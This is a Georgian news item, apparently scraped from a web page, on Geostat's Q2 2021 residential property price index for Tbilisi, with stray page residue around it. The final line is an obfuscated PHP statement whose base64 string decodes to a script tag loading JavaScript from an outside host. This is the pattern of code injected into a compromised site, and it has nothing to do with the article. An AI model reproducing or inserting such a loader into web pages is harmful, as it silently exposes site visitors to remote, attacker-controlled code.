celsiusi
ავერსი საქკაბელი
სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2021 წლის მეორე კვარტალში, წინა კვარტალთან შედარებით საცხოვრებელი უძრავი ქონების ფასების ინდექსი 0.4 პროცენტით შემცირდა, ხოლო ინდექსის წლიურმა ზრდამ 10.1 პროცენტი შეადგინა.
 
საქსტატის ცნობით, 2020 წლის საშუალოსთან შედარებით ინდექსი 8.9 პროცენტით არის გაზრდილი.
 
საცხოვრებელი უძრავი ქონების ფასების ინდექსის დაფარვა შემოიფარგლება თბილისით და მოიცავს მხოლოდ ახალი საცხოვრებელი უძრავი ქონების ბაზარს, როგორც მრავალსართულიანი სახლების (ბინების), ისე კერძო სახლების სეგმენტებს.
 
საქსტატის ინფორმაციით, 2021 წლის მეორე კვარტალში წინა კვარტალთან შედარებით -1.3 პროცენტიანი ფასების კლება დაფიქსირდა საცხოვრებელი ბინების სეგმენტში. ამავე პერიოდში, ფასები 2.2 პროცენტით გაიზარდა კერძო სახლების სეგმენტში.
 
2020 წლის მეორე კვარტალთან შედარებით ფასების ზრდა დაფიქსირდა ორივე სეგმენტში – კერძო სახლებზე 17.9 პროცენტით, ხოლო ბინებზე 7.5 პროცენტით.
990
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");